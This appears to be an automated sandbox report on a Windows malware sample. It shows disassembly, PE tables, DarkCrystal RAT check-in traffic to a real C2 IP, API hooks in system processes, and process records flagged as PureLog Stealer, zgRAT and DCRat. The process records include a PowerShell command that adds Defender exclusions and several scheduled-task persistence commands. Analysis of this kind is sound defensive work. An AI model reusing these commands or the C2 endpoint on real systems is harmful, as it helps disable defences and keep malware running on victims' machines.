                                                      shl ebx, 04h
                                                      dec ecx
                                                      add ebx, edx
                                                      dec esp
                                                      lea eax, dword ptr [ebx+04h]
                                                      call 00007FA13556CF53h
                                                      mov eax, dword ptr [ebp+04h]
                                                      and al, 66h
                                                      neg al
                                                      mov eax, 00000001h
                                                      sbb edx, edx
                                                      neg edx
                                                      add edx, eax
                                                      test dword ptr [ebx+04h], edx
                                                      je 00007FA13556DB23h
                                                      dec esp
                                                      mov ecx, edi
                                                      dec ebp
                                                      mov eax, esi
                                                      dec eax
                                                      mov edx, esi
                                                      dec eax
                                                      mov ecx, ebp
                                                      call 00007FA13556F7E3h
                                                      dec eax
                                                      mov ebx, dword ptr [esp+30h]
                                                      dec eax
                                                      mov ebp, dword ptr [esp+38h]
                                                      dec eax
                                                      mov esi, dword ptr [esp+40h]
                                                      dec eax
                                                      mov edi, dword ptr [esp+48h]
                                                      dec eax
                                                      add esp, 20h
                                                      inc ecx
                                                      pop esi
                                                      ret
                                                      int3
                                                      int3
                                                      int3
                                                      dec eax
                                                      sub esp, 48h
                                                      dec eax
                                                      lea ecx, dword ptr [esp+20h]
                                                      call 00007FA13556CA23h
                                                      dec eax
                                                      lea edx, dword ptr [00023BA7h]
                                                      dec eax
                                                      lea ecx, dword ptr [esp+20h]
                                                      call 00007FA13556EBF2h
                                                      int3
                                                      jmp 00007FA1355749C0h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      Programming Language:
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x4b1e0 | 0x34 | .rdata
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4b214 | 0x50 | .rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x71000 | 0x4ffab | .rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6c000 | 0x2ab4 | .pdata
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc1000 | 0x938 | .reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x460e0 | 0x54 | .rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x46180 | 0x28 | .rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3de10 | 0x140 | .rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x3b000 | 0x4a0 | .rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x4a4ac | 0x100 | .rdata
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3988e | 0x39a00 | b1e4251172e7243c7614dd9f08de8681 | False | 0.5453540197939263 | data | 6.464508992537505 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3b000 | 0x1118c | 0x11200 | 31179600be0d23b2c74edff345900540 | False | 0.44718008667883213 | data | 5.216220468557472 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4d000 | 0x1ef5c | 0x1a00 | 148867e92396c2a403730872d91149f7 | False | 0.2765925480769231 | DOS executable (block device driver o\3050) | 3.1779391259225855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x6c000 | 0x2ab4 | 0x2c00 | 4914dd9fef7c92b1e7e7f57098d6f308 | False | 0.4796697443181818 | data | 5.3938448326175585 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat | 0x6f000 | 0x308 | 0x400 | f83dedcddf9ceb5084b7159064aebc44 | False | 0.23828125 | data | 2.796337056872422 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA | 0x70000 | 0x15c | 0x200 | 4a3322e97146b4fbd4ed6f2bbc580541 | False | 0.408203125 | data | 3.318036041719511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x71000 | 0x4ffab | 0x50000 | 025501bc3f5d0b1f870144ea838068cb | False | 0.230029296875 | data | 3.927578152389179 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc1000 | 0x938 | 0xa00 | c057cd0b29d094da3cebf433be170d6d | False | 0.498828125 | data | 5.228587706357198 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x716e0 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x72228 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x737d4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x73d3c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x745e4 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x7548c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x758f4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x7699c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x78f44 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_ICON | 0x7ccb8 | 0x41c08 | Device independent bitmap graphic, 256 x 510 x 32, image size 261120, resolution 5905 x 5905 px/m | | | 0.14287836031486706
RT_DIALOG | 0xbe8c0 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0xbeb48 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0xbec84 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0xbed70 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0xbeea0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0xbf1d8 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0xbf42c | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0xbf610 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0xbf7dc | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0xbf994 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0xbfadc | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0xbff48 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0xc00b0 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0xc0204 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0xc0310 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0xc03cc | 0x1c0 | data | English | United States | 0.5178571428571429
RT_STRING | 0xc058c | 0x250 | data | English | United States | 0.44256756756756754
RT_GROUP_ICON | 0xc07dc | 0x14 | data | | | 1.25
RT_GROUP_ICON | 0xc07f0 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0xc0858 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipCloneImage, GdipAlloc, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/25/24-10:32:09.038045 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49730 | 80 | 192.168.2.4 | 176.123.168.151
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 25, 2024 10:32:08.796350002 CEST | 49730 | 80 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:32:09.037261963 CEST | 80 | 49730 | 176.123.168.151 | 192.168.2.4
Apr 25, 2024 10:32:09.037359953 CEST | 49730 | 80 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:32:09.038044930 CEST | 49730 | 80 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:32:09.278606892 CEST | 80 | 49730 | 176.123.168.151 | 192.168.2.4
Apr 25, 2024 10:32:09.279153109 CEST | 80 | 49730 | 176.123.168.151 | 192.168.2.4
Apr 25, 2024 10:32:09.279195070 CEST | 80 | 49730 | 176.123.168.151 | 192.168.2.4
Apr 25, 2024 10:32:09.279289007 CEST | 49730 | 80 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:32:09.457537889 CEST | 49730 | 80 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:32:09.740430117 CEST | 80 | 49730 | 176.123.168.151 | 192.168.2.4
Apr 25, 2024 10:33:54.951847076 CEST | 49730 | 80 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:33:55.193032980 CEST | 80 | 49730 | 176.123.168.151 | 192.168.2.4
Apr 25, 2024 10:33:55.193244934 CEST | 49730 | 80 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:34:04.608644009 CEST | 49738 | 443 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:34:04.608685017 CEST | 443 | 49738 | 176.123.168.151 | 192.168.2.4
Apr 25, 2024 10:34:04.608769894 CEST | 49738 | 443 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:34:04.628528118 CEST | 49738 | 443 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:34:04.628551960 CEST | 443 | 49738 | 176.123.168.151 | 192.168.2.4
Apr 25, 2024 10:34:05.121049881 CEST | 443 | 49738 | 176.123.168.151 | 192.168.2.4
Apr 25, 2024 10:34:05.121325016 CEST | 49738 | 443 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:34:05.126394987 CEST | 49738 | 443 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:34:05.126413107 CEST | 443 | 49738 | 176.123.168.151 | 192.168.2.4
Apr 25, 2024 10:34:05.126657963 CEST | 443 | 49738 | 176.123.168.151 | 192.168.2.4
Apr 25, 2024 10:34:05.159436941 CEST | 49738 | 443 | 192.168.2.4 | 176.123.168.151
Apr 25, 2024 10:34:05.159495115 CEST | 443 | 49738 | 176.123.168.151 | 192.168.2.4
Apr 25, 2024 10:34:05.159593105 CEST | 49738 | 443 | 192.168.2.4 | 176.123.168.151
• 176.123.168.151
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 176.123.168.151 | 80 | 8116 | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
Timestamp | Bytes transferred | Direction | Data
Apr 25, 2024 10:32:09.038044930 CEST | 401 | OUT |
  POST /4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
  Host: 176.123.168.151
  Content-Length: 344
  Expect: 100-continue
  Connection: Keep-Alive
Apr 25, 2024 10:32:09.279153109 CEST | 25 | IN |
  HTTP/1.1 100 Continue
Apr 25, 2024 10:32:09.279195070 CEST | 347 | IN |
  HTTP/1.1 301 Moved Permanently
  Location: https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php
  Date: Thu, 25 Apr 2024 08:32:09 GMT
  Connection: keep-alive
  Keep-Alive: timeout=5
  Transfer-Encoding: chunked
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0
Apr 25, 2024 10:32:09.457537889 CEST | 344 | OUT |
  Data Raw: 00 03 04 07 03 0f 01 02 05 06 02 01 02 07 01 06 00 03 05 0b 02 01 03 01 00 52 0a 02 04 04 01 52 0d 54 07 0a 01 07 04 04 0e 51 07 00 00 07 05 05 03 03 0c 5b 0e 00 06 0a 05 01 05 0c 06 56 05 0f 00 0a 0d 5b 05 01 06 02 0d 06 0e 50 0d 04 0c 05 05 51
  Data Ascii: RRTQ[V[PQU]\L}Shcvvrj\vl@|BbYwhkcw_oo`Yo`PDhmtcgpi_~V@A{mvL~b[


Code Manipulations

Function Name | Hook Type | Active in Processes
ZwEnumerateKey | INLINE | explorer.exe, winlogon.exe
NtQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
ZwResumeThread | INLINE | explorer.exe, winlogon.exe
NtDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
ZwDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
NtEnumerateKey | INLINE | explorer.exe, winlogon.exe
NtQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
ZwEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
ZwQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
NtResumeThread | INLINE | explorer.exe, winlogon.exe
RtlGetNativeSystemInformation | INLINE | explorer.exe, winlogon.exe
NtQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
NtEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
ZwQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe

Function Name | Hook Type | New Data
ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF


Target ID: 0
Start time: 10:31:53
Start date: 25/04/2024
Path: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe"
Imagebase: 0x7ff7f4d60000
File size: 6'701'051 bytes
MD5 hash: 6ACBB1FB58DCCD74DB667187B22DE689
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 10:31:54
Start date: 25/04/2024
Path: C:\Users\user\AppData\Local\Temp\GargantuaN.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\GargantuaN.exe"
Imagebase: 0xd50000
File size: 2'289'873 bytes
MD5 hash: B3CEE15E9FDDC0E7DC33069319B549D6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 53%, ReversingLabs
• Detection: 53%, Virustotal
Reputation: low
Has exited: true

Target ID: 2
Start time: 10:31:54
Start date: 25/04/2024
Path: C:\Users\user\AppData\Local\Temp\GargantuanS.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\GargantuanS.exe"
Imagebase: 0x7ff7a2250000
File size: 5'475'840 bytes
MD5 hash: 7A568EF3F46D369F3D3FFD68FDF68573
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 81%, ReversingLabs
• Detection: 61%, Virustotal
Reputation: low
Has exited: true

Target ID: 3
Start time: 10:31:54
Start date: 25/04/2024
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe"
Imagebase: 0x590000
File size: 147'456 bytes
MD5 hash: FF00E0480075B095948000BDC66E81F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 4
Start time: 10:31:59
Start date: 25/04/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 10:31:59
Start date: 25/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 10:32:00
Start date: 25/04/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 10:32:00
Start date: 25/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 10:32:00
Start date: 25/04/2024
Path: C:\PerfDll\hyperProviderSavesinto.exe
Wow64 process (32bit): false
Commandline: "C:\PerfDll/hyperProviderSavesinto.exe"
Imagebase: 0x7b0000
File size: 1'968'128 bytes
MD5 hash: 3997D7D058AF3C1B6C9ABB57F6FA1F2A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1698928747.00000000007B2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
• Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1741648776.0000000012DCC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PerfDll\hyperProviderSavesinto.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PerfDll\hyperProviderSavesinto.exe, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 88%, ReversingLabs
                                                      • Detection: 74%, Virustotal
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:10:32:02
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff693ab0000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:10:32:02
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:10:32:02
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:10:32:02
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:17
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
